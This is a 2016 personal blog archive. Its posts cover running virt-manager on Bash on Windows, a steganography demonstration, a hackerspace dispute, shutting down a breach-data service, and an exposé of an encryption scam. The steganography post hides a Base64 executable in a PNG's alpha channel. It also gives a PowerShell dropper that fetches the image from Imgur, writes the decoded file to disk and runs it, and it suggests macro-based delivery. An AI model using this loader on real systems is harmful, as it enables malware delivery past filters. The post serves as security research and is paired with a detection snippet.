Tuesday, 20 December 2016

Windows 10, Virtual Machine Manager, and KVM

I really, really like the fact that Microsoft has embraced Linux in the form of releasing Ubuntu on Windows. To me, it's probably the first Linux on the desktop solution that is as good as using Linux itself without having to worry about using virtualization for my Windows applications and games. However, it's not exactly a true Linux kernel running behind the scenes, and there are other things that will simply not work.

For one, out of the box you cannot use any X11 applications without an X server installed and some extra configuration. However, it is relatively painless to get this up and running and just as easy to get Virtual Machine Manager working as well. If you already have access to the KVM tools on the VM host, you will be able to use it remotely using an SSH connection from the Windows computer.

This is what we're going to need to install:

  • OpenSSH Client
  • Virtual Machine Manager
  • Python Spice GTK module

Assuming that you have already gone ahead and updated and configured Windows 10 to use the feature, you'll want to use Xming to act as your X server. There are other X servers you can consider, including MobaXterm and VcXsrv, but I prefer Xming due to its simplicity and the fact that it sits in the tray once you launch it.

Running XLaunch after installing Xming brings up this screen. Personally, I prefer having it set to multiple windows but of course you'll want to set this to your liking. You can leave the rest as defaults and it should be fine.

With the X Server out of the way, we'll want to configure Bash on Windows to automatically connect to the X server. This can be done by editing the .bashrc file in your home directory with the following at the end:

export DISPLAY=:0

Close and reopen Bash on Windows and it is ready to go. You can test whether or not it works by installing something like gedit or xterm and seeing if it launches.

We do, however, have to enable D-Bus, as Virtual Machine Manager depends on it. We can do this quickly with the following command:

sudo sed -i 's$<listen>.*</listen>$<listen>tcp:host=localhost,port=0</listen>$'\ 

Once this is done we can now proceed to install VMM.

sudo apt-get install python-spice-client-gtk virt-manager openssh-client

This shouldn't take too long and once it's done all we have to do is type the following command:


And here we are!

It should be noted that you cannot create virtual machines on your Windows 10 computer using this method--you're better off using Hyper-V if you want to go down this road. However, it is at this point that we can connect to a KVM host using SSH.

You'll want to configure OpenSSH within Bash on Windows first with key-based authentication to proceed but once that is done it's relatively simple to configure the system. Under the File menu, you'll see Add Connection which will ask you for some details:

You should see your VMs populate now:

And you can even use them as a console:


Friday, 2 December 2016

Going viral on Imgur with Powershell and PNG

A few months ago, Kaspersky put out some research into using PNGs to distribute malicious payloads, where malware authors had been embedding PE files into the images themselves. The give-away that something was amiss was that the images had a 63x48 pixel resolution but were sized at 1.3 MB.

This isn't very stealthy, and there are ways to do this better.

Encoding a file within a PNG

First, it helps to understand a PNG file. Unlike JPEG, PNG is lossless even though it is compressed, meaning that when you create an image in the format, it retains the data it was generated with until the resolution or colour palette is modified. Unlike a GIF, a PNG file handles transparency through an alpha channel instead of colour substitution.

It's this compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit value for the transparency level (referred to as the "alpha channel"). This means that each pixel is represented as R, G, B, and A, each with a value from 0-255.

Here's a sample image (sourced via Wikipedia) with what I am talking about:

This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels, or 468 KB of data that we can place within. Let's use Pillow and Python to mess with this.

The script itself is relatively straightforward:

from PIL import Image
from sys import argv, exit
from base64 import b64encode

i = argv[1]  # source PNG
o = argv[2]  # output PNG carrying the payload in its alpha channel
with open(argv[3], 'rb') as f:
    text = f.read()  # payload to embed

img_in = Image.open(i).convert('RGBA')  # make sure there is an alpha channel
img_pad = img_in.size[0] * img_in.size[1]  # one payload byte per pixel
text = b64encode(text)
if len(text) <= img_pad:
    # pad with null bytes until the encoded data fills every pixel
    text = text + b'\x00' * (img_pad - len(text))
else:
    print('File is too large to embed into the image.')
    exit(1)
# one chunk per column, one byte per row within that column
text = [text[n:n + img_in.size[1]] for n in range(0, len(text), img_in.size[1])]

img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)

for ih, tblock in zip(range(img_in.size[0]), text):
    for iv, an in zip(range(img_in.size[1]), tblock):
        x, y, z, a = img_in.getpixel((ih, iv))
        pixels = (x, y, z, an)  # keep the colour, replace the alpha value
        img_o.putpixel((ih, iv), pixels)

img_o.save(o)

Executing it is as follows:

$ python encode.py image.png image_out.png payload.dat

When it runs, it first checks that the payload is not larger than the image can hold, encodes it with Base64, and pads it with null bytes until it reaches the total number of pixels. Each pixel's alpha channel value is then replaced with the value of the corresponding character of the encoded data, and the result is saved to disk.

Let's embed an image into an image, shall we?

I've encoded a JPEG inside this image. The image has obviously changed towards a bit of a softer look, with some jankiness in the transparency, but you'd normally never think of it as suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.

For the curious, this is the image that was embedded within:

This Python script can retrieve the data out of the image:

from PIL import Image
from sys import argv
from base64 import b64decode

i = argv[1]  # PNG carrying the payload
s = argv[2]  # where to write the recovered file
o = bytearray()

img = Image.open(i).convert('RGBA')

# walk the pixels in the same column-major order the encoder used
for x in range(img.size[0]):
    for y in range(img.size[1]):
        p = img.getpixel((x, y))
        o.append(p[-1])  # the alpha value carries one byte of the encoded data

o = bytes(o).replace(b'\x00', b'')  # drop the null padding
o = b64decode(o)

with open(s, 'wb') as f:
    f.write(o)

We can confirm that nothing is lost by running these commands:

$ md5 blog_sample.png
MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b
$ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ md5 antivirus.jpg
MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b
$ python decoder.py blog_sample.out.png antivirus.orig.jpg
$ md5 antivirus.orig.jpg
MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b

As you can see, the embedded file comes back out of the image's alpha channel with its contents unchanged.
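The encoding scheme above leaves a fingerprint a defender can look for: an alpha plane made almost entirely of Base64 symbols and null padding, rather than the 255-heavy, smoothly varying alpha of a genuine image. The following is added detection code, not the post's encoder or decoder; it works on a list of alpha values (the `alpha_values_from_png` helper shows how to obtain one from a real file with Pillow), and the alpha planes it checks are constructed inline.

```python
"""Heuristic check for Base64 text carried in a PNG alpha channel.

Added example, not the original post's code.  The sample alpha planes below are
constructed in memory; no real image files are involved.
"""
import base64
import string
from collections import Counter

# The 64 Base64 symbols plus the encoder's null padding byte.
BASE64_ALPHABET = set((string.ascii_letters + string.digits + "+/=").encode("ascii"))
PAYLOAD_VALUES = BASE64_ALPHABET | {0}


def alpha_plane_stats(alpha):
    """Summarise an iterable of 8-bit alpha values."""
    counts = Counter(alpha)
    total = sum(counts.values())
    if total == 0:
        raise ValueError("empty alpha plane")
    in_payload_set = sum(n for v, n in counts.items() if v in PAYLOAD_VALUES)
    return {
        "pixels": total,
        "payload_fraction": in_payload_set / total,   # share of values that are Base64 or 0
        "opaque_fraction": counts.get(255, 0) / total,  # share of fully opaque pixels
        "distinct_values": len(counts),
    }


def looks_payloaded(alpha, threshold=0.98, min_distinct=8):
    """Flag an alpha plane whose values are almost all Base64 symbols or 0.

    A normal image puts most alpha values at 255, which is not a Base64 symbol,
    so its payload_fraction is low.  min_distinct keeps a fully transparent
    plane (every value 0) from being flagged.
    """
    stats = alpha_plane_stats(alpha)
    return (stats["payload_fraction"] >= threshold
            and stats["distinct_values"] >= min_distinct)


def alpha_values_from_png(path):
    """Read the alpha plane of a real file; needs Pillow (not used by the samples)."""
    from PIL import Image  # imported here so the rest runs without Pillow
    with Image.open(path) as img:
        return list(img.convert("RGBA").getchannel("A").getdata())


# --- constructed samples ------------------------------------------------------

def sample_clean_alpha(width=40, height=30):
    """Mostly opaque plane with a soft fade on the left edge, like a logo."""
    values = []
    for x in range(width):
        for y in range(height):
            values.append(min(255, x * 32) if x < 8 else 255)
    return values


def sample_payloaded_alpha(payload, width=40, height=30):
    """Mimic the post's encoder: Base64 text, then null padding, one byte per pixel."""
    text = base64.b64encode(payload)
    capacity = width * height
    if len(text) > capacity:
        raise ValueError("payload does not fit in the image")
    return list(text + b"\x00" * (capacity - len(text)))


def recover_payload(alpha):
    """Invert the encoder the way the post's decoder does: strip nulls, decode."""
    return base64.b64decode(bytes(v for v in alpha if v != 0))


if __name__ == "__main__":
    for name, plane in (("clean", sample_clean_alpha()),
                        ("payloaded", sample_payloaded_alpha(b"hello world"))):
        print(name, alpha_plane_stats(plane), looks_payloaded(plane))
```

The threshold is deliberately strict: even a modest amount of real alpha blending pushes values outside the 65-byte payload set and drops the fraction well below it.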

Let's use Imgur and Powershell to abuse this

Since its debut on Reddit, Imgur has become one of the largest image hosting services. This is largely due to its ease of access in uploading images without requiring anyone to create an account.

In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use the old technique of combining a zip file with a JPEG or PNG on their service, as it appears to outright strip the extra data.

Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encode as demonstrated earlier. Let's try uploading the sample image from earlier and check.

$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ wget https://i.imgur.com/Oj8FhU5.png
--2016-11-24 13:56:50--  https://i.imgur.com/Oj8FhU5.png
Resolving i.imgur.com...
Connecting to i.imgur.com||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 664208 (649K) [image/png]
Saving to: 'Oj8FhU5.png'

Oj8FhU5.png               100%[====================================>] 648.64K  2.42MB/s   in 0.3s

2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208]

$ md5 Oj8FhU5.png
MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39

As we can see here, the file from earlier that was uploaded to Imgur has not been altered.

So where do we go from here? How is this useful? Well to start, the thing that Imgur is great for is that you do not need to sign up with an account to upload an image. Why not use it to distribute malware without having to provide too many details?

One thing to be concerned about is that you have to have the ability to retrieve the PNG image and then process it: while there have been code execution issues with PNG libraries in the past, for the most part just loading a payloaded image is unlikely to result in compromise.

Fortunately, Windows has built-in functions that straight up let you work with an image and extract the pixel data. This can be achieved using Powershell without any additional modules. The code is as follows:

Add-Type -AssemblyName System.Drawing

$strURL = "http://i.imgur.com/nckqSN1.png"
$strFilename = "c:\temp\payloadb64.png"
$peOutputFile = "c:\temp\calc.exe"

Invoke-WebRequest -Uri $strURL -OutFile $strFilename

$image = [System.Drawing.Image]::FromFile($strFilename)
$peBase64 = @()
for ($w = 0; $w -lt $image.Width; $w++) {
    $row = @()
    for ($h = 0; $h -lt $image.Height; $h++) {
        # the alpha (A) value of each pixel holds one character of the Base64 text
        $pixel = ($image.GetPixel($w, $h)).A
        $row += [char][int]$pixel
    }
    $peBase64 = $peBase64 + $row
}

# drop the null padding and join the remaining characters into one string
$peImage = ($peBase64 | Where-Object { $_ -ne "`0" }) -join ""

$peImage = [System.Convert]::FromBase64String($peImage)
[System.IO.File]::WriteAllBytes($peOutputFile, $peImage)
& $peOutputFile

The script works as follows:

  1. Download a PNG from Imgur and save it to disk
  2. Using System.Drawing, read every pixel and extract the alpha (A) value
  3. Ensure that all null values (0x00) are stripped from the array
  4. Decode Base64 and write file to disk
  5. Run the newly decoded file as an executable

And based on the above code, it of course executes calculator:

Executing the above code does require that your system's execution policy allows Powershell scripts to run. That said, while on most home computers this is not an issue as it is disabled by default, many enterprise environments require it to be enabled. A way around any restrictions could be to execute the code with the help of VBScript, perhaps storing all of this within a Word macro.


One thing to keep in mind is that while the attack was done using Powershell, it doesn't mean that you couldn't achieve this with a Word document with an embedded macro. From an end-user perspective, not executing any unwanted code is really the best way to avoid this.

Imgur's response

Imgur did get back to me, stating that, while informative, there isn't an immediate need to fix the issue given the impact it presents.

Last Remark

I want to make it clear here that what I am showing with embedding data through a steganographic process is far from new, as it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice and there are many guides out there to read and software suites to use.

Also, yesterday, PortSwigger posted an article on doing something similar using JPEG files that was rather interesting.

Thursday, 1 December 2016

A follow up on Vancouver Hack Space

A few weeks ago, I penned an entry on my thoughts about the direction Vancouver Hack Space (VHS) had gone and what led to my decision to ultimately leave it. My opinion about the matter has not changed, but there were comments left and I would like to reply to them.

I should be clear that I am not going to direct the replies necessarily at the commenters themselves, so please forgive me if you feel like I am finger pointing at any specific individuals.

I think it's interesting that you're pining for a VERSION of VHS, rather than evaluating what VHS has become. It's entirely valid to feel that what you're personally looking for in a hackspace is no longer found at VHS, but personally I think that the "be everything to everyone" attitude is a great model.

The reason I left the space was primarily that it had a larger toxic element than it did before, and there were individuals who felt it was better to have a top-down approach to dealing with matters than a consensus approach where every member had a say in things.

The "be everything to everyone" model was something that crept into VHS over time and led to it being too inviting: while we wanted people who didn't know anything to learn, we didn't want people who didn't want to learn to join. There are people at VHS now who do nothing more than exist as a VHS member, adding no value other than saying that they're a member or occupying space for a hobby that is hard to get into--such as the amateur radio station.

If you prefer a version of VHS yourself that is losing over a dozen members each month based on how I describe it then so be it. I am not sure why you'd want a space that allows members who engage in harassment towards others with little resolve but whatever keeps you happy I guess. Your space is not immune from criticism just as much as my opinion isn't either.

He's since been banned from the space for stealing VHS property (a web domain) and continues to (in my opinion, though he's at least polite about it) harass current and potential members on social media "warning" them about the toxic environment, that he himself has created.

I'm glad to hear that the space has taken steps to ban someone from the space for stealing a domain, but am dismayed that you see his opining on how toxic the environment is as constituting harassment. If he (like myself) believes that something is toxic to be part of, he has every right to tell someone about it. This is not harassment.

If VHS were truly about stopping harassment, it needs to look within. I was corrected on the membership status (or lack thereof) of the individual I mentioned in my original piece, but he is still actively a part of the space and is encouraged to be there by the same individual who was harassing the person that VHS had banished. This to me is enough to say that VHS is a toxic space.

Banning someone from the space is only required when you're dealing with real problems. Someone who has been banned from other groups and is harassing members (such as myself) should be an immediate ban. Someone who has had the cops called on them at the space and has possibly been involved in the destruction of a member's project should face an immediate ban. The fact that the decision to ban someone is being made but other examples are being overlooked tells me that there is a vindictive nature to the board and it's not healthy.

For the record, when I was still actively involved in VHS, this person had already been banned before, and he was only the second person to have been banned at all. The other person who was banned was banned because they came to borrow an angle grinder for the purpose of removing a bike lock for the second time in two weeks--there were other incidents that led to this decision but this was the final straw.

As much as it pains me to say this, looking at how Noisebridge deals with this is sort of a way to learn from this all.

As for queer members, there's at least me, I agree that's not much, but from the people that I've seen coming to the open nights, it's not exactly a case of not making the space seem safe as much as perhaps not advertising the space's existence in the correct places?

I'm happy to hear that there are members of the LGBTQ community that take the time to be part of the space, but my point about how it presents itself as a bunch of white males does not change. The space doesn't need to advertise better.

VHS is a cheap place to use a laser cutter. That's about it these days. There are still some excellent people down there that only know it in its current form, and that's unfortunate. 

VHS has a tonne of good equipment and that should draw in people to use it. If you're losing so many members per month but have all of this great gear, what do you suppose the reasons behind it are?

The fact that this isn't being addressed and instead you're looking to do silly things like make a member-in-residence role where they maintain the space during its off-hours and not have to pay membership dues tells me that there are problems being overlooked. We never considered this and while there were times people were being messy with stuff being left behind out of order, it never got to the point where we needed anyone to come in and clean it up regularly.

first, kudos if you were one of the founding members of the Hackspace

This isn't the case. Vancouver Hack Space formed in early 2009; I joined in July that year, not at the point of its formation. You can say that I was one of the original members of the space (like the first dozen or two) but I do not count myself as a "founding member". I guess legally I can say I was a founding member as I believe I was one of the original signatories as per the Societies Act, but my memory is fuzzy on this one.

I believe that no founding member nor anyone pre-2010 is still a member of VHS in good standing.

Apparently in those days you also had to "Disclose your motives and affiliations" - number 5 on the list of "Principles of Unity"

There was a good reason for this and that was to prevent people from usurping the space and using it for their own political purposes--VHS was intended at its start to be as apolitical as it could be.

Prior to the 2010 Winter Olympics, anyone associated with any group that was against the Olympics or anything connected with them was being harassed by the RCMP and Vancouver Police Department. A number of the original members who founded the space or were part of it in its early days had found themselves either being followed or documented due to their involvement or relationship to these groups. I do know for a fact that I was being targeted even though my affiliation with these groups was purely through friendship and association--I never participated with any of these groups either and for the record I actually attended a curling match during the games.

We had instances where independent media groups had asked us to use the space so they could work on their video projects--we said no. We had people who wanted to throw some party during the Olympics--we said no. It wasn't easy but we did our damnedest to avoid being affiliated directly with any political movement.

We also suspected that the space had been bugged at one point, although it is tough to say whether or not it was true or if we were just being overly paranoid--it would not have been hard to hide such things in 45W, and with more and more I learn about surveillance it's hard to believe otherwise.

When you joined VHS, we wanted to know why you were interested in being part of it. Was it to learn? Was it to pitch a multi-million dollar shitheap of a startup? Or was it because you wanted to make the space into something of your own?

These original rules of VHS served us well and the fact that today you proudly display a code of conduct and by-laws tells me that the space has gone from being a place that would do cool things to a place that really is a maker space and nothing more. To me, VHS has gone from being a hackerspace to a non-profit tech shop--the front page proudly demonstrates that by stating "[the] community garage for a community without garages".

There is nothing wrong with it becoming this, but it would be less of a problem to me if the element of harassment was dealt with appropriately and it kept the same diversity it had when VHS was really at its peak in 2012/2013.

My other comment is about the wall in the "Bunker" space - it was there for a reason, that being to keep dust out of the common area and also reduce the noise - not to segregate one activity from another.

I know why the wall was put up and completely understand this. My point was a philosophical one.

I want to say openly that there are people who are still involved with VHS that I still respect and I do hope that while I am lambasting what it has become that they don't see me as someone who is engaging in harassment towards it and its members.

Closing off, I have had a few members reach out to me about my opinions and I do want to address two things.

For one thing, I was corrected that the harassing individual is not listed as a member of the space. While I am happy to hear this, I still believe that his existence at the space on some sort of interval is a symptom of the problems the space is facing that ultimately lead to me not wanting to be around. The fact that he is associated (either as an acquaintance or an actual friend I do not know) with the individual that had the VPD called on them is even more alarming.

Secondly, while I appreciate being asked how to fix the space, I actually don't want to. It's not that it can't be fixed, but VHS has sort of succumbed to the Ship of Theseus paradox: while it's VHS in name, it's not the same VHS we started off at.

I appreciate those coming out to offer their comments and asking questions, but my opinion is that VHS has become something I don't care for any longer.

Monday, 21 November 2016

Shutting down Canario

On December 16th, I intend to shut down Canario (formerly Canary)--and by “Canario”, I mean the service, not the company, of which I will explain later.

The reasons for this are simple: I am starting a new project in the new year and unfortunately cannot put effort into it without removing something else--and with that, Canario has to go.

The decision has been quite difficult because the project has taught me a lot about what I can do as a single individual, but at the same time it also taught me my limitations. I’ve had a few people work with me on Canario over the course of the past four years, but the vast majority of its heavy lifting, maintenance, development, and research has been me and me alone. Overall it has been a tiring experience, but far from a regret and really rewarding.

The journey towards ending it started around the summertime when I was playing around with the idea of rebuilding it to be more like other services such as HaveIBeenPwned. I like how Troy Hunt has made it very simple, but one aspect I’ve always found lacking about it was that using it for research purposes was very limited. Having said that, his goal isn’t to provide those capabilities but rather to inform people when their information has been compromised and/or exposed.

As I had gone about developing this new capability, I had been sitting on an idea completely different from Canario but kept thinking about it as just a novel idea with little additional thought. However, in September, I found myself looking into the idea a bit further, doing some research into other similar things (I am being vague here, yes) that were otherwise lacking in features. I came to the conclusion that this idea would be something worth pursuing. I can make it fund itself with a lot less effort and be able to get people involved with, again, a lot less effort.

Circling back, Canario has four big problems for me:

  1. The type of data I am working with is never uniform and never will be. Someone posting a data dump on Pastebin or any other service is going to almost always have it in some unique format where there may be similarities to past dumps, but never enough for me to just automate to near perfection.
  2. Getting exposed data that isn’t publicly available has so many complications. I have become pretty adept at finding this data, but trying to get people to come to me with that data in the same way others have succeeded has proven to be unsuccessful on my part.
  3. Trying to get others on-board to work with me has been difficult at best. I’ve had cases where people wanted to get involved but wanted to have strings attached or where they wanted to contribute data but I wasn’t permitted to sell access to it.
  4. Other people and organisations are doing a better job than me and will continue to do so.

The latter part is really more of a sore point: I have tried to reach out to people, but by the time I had started to do this there were others in the space already, and trying to improve on what I had already done was going to be difficult.

To add to this, I was funding the project out of my own pocket and contributing my free time, so in some ways I wonder if I was being blinded by my egotism to go about it my own way and not let others interfere. One of the difficulties I had overall was trying to come up with a model that would allow it to be self-financed, but every time I’d come up with a model that could work I found it to be very onerous and likely to be of no benefit in the long term.

Having said all that, Canario taught me database design dos and don’ts (and also taught me to hate MySQL and embrace Postgres), allowed me to speak at conferences, has gotten me cited in the media, and it even gave me an opportunity to speak at Facebook to talk about threat intelligence, a topic that I have a lot of mixed opinions about.

So what next?

First of all, when I do close off the service, it’ll just be a hard shutdown. As it stands right now, I have not added any new data since November 15th and I will be leaving it all in place until sometime on December 16th. All user accounts and associated data will be permanently deleted as I do not wish to hold on to this data any further. I’ll do my best to clear up any backup data I have sitting around but for certain the live data will be gone.

All data that has been collected will no longer be available via the site--so search and data viewing will cease to function. If there are requests for copies of the database (again, without user data), I’ll consider them but likely it will not be free and will be as-is--if you plead your case on the “not free” part I’ll hear it.

Second of all, I am starting a new project and I am trying to get others involved. It’s not a pure information security project but at the same time it’s the core aspect of it. I want to make it easier for schools and small businesses to be able to do specific things. Additionally, Canario will continue as a legal entity, acting as a parent to the project.

Obviously right now I am being a bit hush-hush on this idea of mine, but if you’re interested in working with me on this and understand networking and cryptography, let me know--there’s your hint to what I am working on. Aspects of it are going to be open-source.

Monday, 14 November 2016

Why I left Vancouver Hack Space

I recently became aware of a blog post by a fellow former member of Vancouver Hack Space (VHS) about alternatives to the hackerspace in light of it becoming a rather toxic environment. A few years ago, I had penned a draft piece about why I chose to leave but never bothered to publish it. After having seen someone else's disgust for what it has become, I have decided to speak up.

One way to start is to show what VHS looked like in 2009 when I had originally joined (my old iBook is visible in the shot too):

This was the first un-shared physical space that VHS occupied, a room that was barely larger than my living room being used by twenty or so people who all had the same goal in mind: do cool shit. On my first night there, I was enamoured and immediately signed myself as a member.

For me, it was the start of a lot of things: I met a lot of great people, made friends, furthered my own career, and learnt new things--it contributed to me being a better person overall. When I found myself working downtown after leaving my job in Surrey, I was able to put more time into the space and was able to leave work and go straight there to hangout.

VHS had spun up a lot of cool projects or was at least the catalyst for bigger things. The best one I can think of is Mini Maker Faire Vancouver, which otherwise may have never happened if it weren't for the space. Two startups come to mind that have changed the personal lives of members for the better and again it may have not been this way if it were not for VHS' existence.

I think that around the time that VHS started to need a new space and new members were coming in was the time I started to lose interest in being an active member. For a while, I would still go on a regular basis, but found as time went on that the space was changing, and it was changing for the worse. When it left its location on Hastings Street for a larger one on East 1st Avenue, it was pretty much the end for me and the place because it had already become something that it shouldn't have been.

The aforementioned blog piece I mentioned stemmed from a variety of abuses directed at someone who spoke out. This was posted to the members-only discussion forum back in May:
Someone cleaned out my locker and stole some of the items in the locker; other items ended up in the drop box. This happened between Thursday May 5th and May 11th. My locker was not locked, but was labeled with my name and there was a note in the locker that said "[person's] locker, not free, not available"
You have a thief and an asshole at the space. More bad people.
I don't suggest leaving anything of value at the space any more.
Back when VHS was smaller, this behaviour where items were stolen was exceedingly rare, to the point where it was more often things getting misplaced, borrowed, or general ignorance--and even then I am failing to remember if and when these circumstances occurred. We were generally better at keeping assholes out of the space, and I would argue that until the move away from Hastings Street the unwritten policy for how it was done went fairly well.

An example of a toxic individual being removed successfully was one person who came to the space in 2012 for one of our Super Happy Hacker Houses (SHHH). This was a periodic event we'd host where we'd have a keg, some music, lots of people, and then the later part of the evening devoted to three minute lightning talks where one could talk about whatever cool topics we had in mind--I had previously given talks on generating tripcodes, lock-picking, and Python to name a few.

This individual that evening chose a rather thoughtless talk: stealing credit card numbers from the wireless network at the Vancouver Public Library. It didn't get too much attention as it was towards the tail end of the evening, but it continued on the IRC channel later on. I ended up calling this person out on this, citing that it was fairly idiotic from an operational security point of view to openly admit that you were looking to commit fraud. His response was to use some uncreative insults, resulting in his removal from the IRC channel, and he was then made aware that he was not welcome at VHS.

I'd say that this person's story with me ended there but he would later attempt to include himself in VanCitySec a few years later, resulting in him being removed from the IRC channel as well. He was then removed from being able to attend BSides Vancouver and then finally removed from OWASP's Vancouver chapter after he went off on the organizers and the speaker after the event had concluded when someone had enough of him interrupting their conversations. At an extreme level, he even managed to get a visit by the local police after he had admitted to intrusion on the wireless networks of the local transit agency.

It didn't help that later on I found out that he was harassing a friend of mine at a local meetup.

To this day, I still get him periodically showing up in the various Freenode channels I am in, taunting me over some non-existent botnet that he suspects I run. In almost all cases he ends up getting himself removed from the channel after I realise who he is.

In fairness, I do believe that he has some rather difficult problems to overcome (I have had people show me some aspects of his personal history that were troubling), but one of the things that I have learnt is that even if you know a reason for why someone exhibits shitty behaviour towards you or someone else, it is not something you have to sign up for and you should be able to remove that person if you feel it is necessary.

The reason why I bring up this person in particular is because he was the final straw for me deciding to leave the space: he was making an appearance again and I was finding it problematic that nobody was enforcing the ban--this was before the remarks about OWASP and the local meetup I should add.

When I spoke up on the mailing list, the response I got from someone who later ended up having someone at the space call the police on them was that he had every right to be in there--funny how assholes defend other assholes. At a meeting, he was eventually formally banned, but after a year the ban had apparently expired; in the space's own words, "[person] has since expired and he is welcome back at VHS".

I recently learnt that he had joined the hackspace after another encounter with him on Freenode, citing that I was an impediment to his membership. Of course, when he was banned in the first place, I had three people contact me privately letting me know that whatever decision VHS made would influence whether or not they'd be members.

This is not the only story involving harassment that I could bring up but this one I have first-hand knowledge of. I'm also exempting his name from this entry because I do not wish to attract his attention.

One of the things I can point out is that the whole makeup of how VHS is run and operated has changed since its beginnings. I'll use this photo as an example from the 2014 AGM:

Photo: VHS AGM 2014 Group Photo

In this photo, there are twelve men. I don't take exception to seeing twelve men, but I damn well know that in the past we had women as members, some of whom served as board members--I'll clarify something about how this "board" works, or rather used to, in a bit. Hell, even the aforementioned Maker Faire event was put on for the first few years by someone about whom I cannot say enough good things in terms of creativity and organizational skills. The fact that in 2014, six years after VHS was founded, it would still show a mostly male face even though it is apparent there are female members and those from the LGBTQ community amongst the membership is downright distressing.

The board that VHS has was originally created to satisfy the requirements of the Societies Act, a law that governs non-profits and other like-minded organizations in British Columbia. I served two years on the board and we only officially met when it was time for our annual general meeting, which again was a requirement of the act. Its sole purpose was to satisfy those legal requirements and to make insurance easier for us to get, but since then the board has morphed into an overseeing eye, drafting policy and everything, which was beyond what VHS was meant to be.

All in all, by the time that the person was banned after discussion amongst members of the space, the board had become something that oversaw everything and VHS was something that it wasn't when I first joined five years earlier. The writing on the wall should have been apparent when walls were erected to keep the woodworking away from the rest of the space that things were going to change. When the ham operator group formed within VHS and wanted to form a society within the society for the purposes of getting government grants for themselves and themselves alone, I knew that my time was done.

Since then, I have visited the space once at its Cook Street location and while it definitely is still a hackerspace, the original vibe it had years prior is not there. It doesn't feel like it's doing anything challenging and while there are members there I still respect and chat with periodically, I cannot say that I want anything to do with the organization.

Today, I find myself going to VanCitySec, other local security events, and am friends with people who share the same ethos that I do, but it is really saddening that a space like VHS in 2009 is no more and I believe that the only reason it died was because it wanted to be everything to everyone. The original space is something I truly miss.

Sometimes it's hard to notice that you're becoming a victim of your own success and eventually you miss the forest for the trees.

Tuesday, 17 May 2016

MyDataAngel.com is not new and is an outright scam

As evident in this KickStarter and this other one, we've seen countless snake oil being peddled to helpless people who are only looking to protect themselves on the Internet. Well, this time we have a product called DataGateKeeper (DGK), and they're looking for $25,000. Their claims are that it's anti-hacking software that provides encryption levels far more advanced than AES.

Because I hate this sort of crap, I figure it's time to document who these people are and what the product actually is. I should note that I initially wondered if it was a troll (as did Bruce Schneier), but I am now convinced that it is a scam.

I am going to refer to this as MyDataAngel.com or "MDA" as there's a tonne of confusion here due to the iterations this software has gone through. What they're selling is not only not new, it has been offered for sale under many different names with various other people involved.

I'd like to thank Ryan O'Horo for helping to form the timeline and providing other tidbits.

Meet the Team

Here's an image from their KickStarter:

It helps to know who these people are in order to paint a picture of what we're dealing with.

  • Raymond Talarico (CEO) - once sued over a suspected embezzlement of $30,000 (via the SEC) from a company he was formerly CEO and founder of, Raymond is the CEO of MyDataAngel.com. Formerly, he was a director of FileWarden.com, which has a relationship with MDA, until July of 2014. Talarico is also President of American Pacific Rim Commerce Group (APRCG).
  • Debra Towsley (President) - Debra has worked alongside Raymond for at least a decade and was cited in the aforementioned SEC document. She was formerly president (and later CEO) of the company Talarico founded. There are claims that she worked as Director of Marketing for Blockbuster in Florida and she has been cited as involved in several other companies. She has recently taken to scrubbing her LinkedIn profile for some reason.
  • Frank Ruppen (Chief Strategy Office) - a Harvard Business School graduate, having worked at large companies such as Procter & Gamble (as claimed in his LinkedIn), Frank is the founder of Forward Associates, a "brand management" company whose mission statement is to provide 404 pages. I should also note that the use of "Office" in his title is not a mistake on my part.
  • Joshua Noel (Creative Director) - the creative director and likely cameraperson behind the useless videos that were incorporated into the KickStarter. Formerly a YouTube LetsPlay turned wedding videographer, Joshua now finds that his business address is being shared with MDA's.
  • Loreena Stanga (Cat Herder & Code Management) - an arts student, turned code manager for MDA. She has recently deleted her LinkedIn and Twitter accounts.
  • Jensen Dillard (Data Angel Host) - host of the dumb KickStarter videos, she left her job as an employee at a veterinarian hospital to host a fake newscast.
  • Steve Talbott (Advisory Board) - you can refer to him as "Captain Steve" as he runs a yacht tour company in the Florida Keys.
  • Chad Thilborger (Data Angel & Host) - a TV food personality who's best known for some South Floridan TV show and for shoving a tonne of what I can only assume is parsley into his mouth.
  • David Smith (Advisory Board) - probably one of the most generic names possible, I was unable to get any information on him so I have nothing snarky to say.
  • Frankie (Data Angel & Celebrity) - likely the most intelligent individual amongst this team as it's nothing more than a lousy skeletal model that they use as a gag prop in their videos.
There have been other people involved in the past but I will mention them as I go along. For the most part, the two people of interest should be Towsley and Talarico. I will also mention that there are no cryptographers working for them.

Update - 20-05-2016

It turns out that Talarico and Towsley are married. You can read this claim in this article from 2006:
Talarico joined family and friends in watching his filly J P Sage take the lead near the final turn and trot on to win the night's 10th race. Talarico, his wife Debra Towsley, and their group then posed with J P Sage for the traditional winner's circle photo.
This detail will help paint a picture of what is going on with this KickStarter. Thanks to Stephen Tinius for pointing out his involvement with APRCG and his relationship status with Towsley.

Before MyDataAngel.com, there were other iterations

Here are some names we should make ourselves familiar with before we go on about how the timeline makes no sense:
  • Centuri Cryptor
  • FileWarden.com
And here's a cropped copy of their KickStarter timeline up until now:

Let me give you guys a better timeline that is more factual:

1997-01-21 - Raymond Talarico incorporates Sci-Fi Megaplex in Fort Lauderdale, FL [florida.intercreditreport.com]
1998-01-01 - Debra Towsley serves as VP of business development for Sci-Fi Megaplex [sec.edgar-online.com]
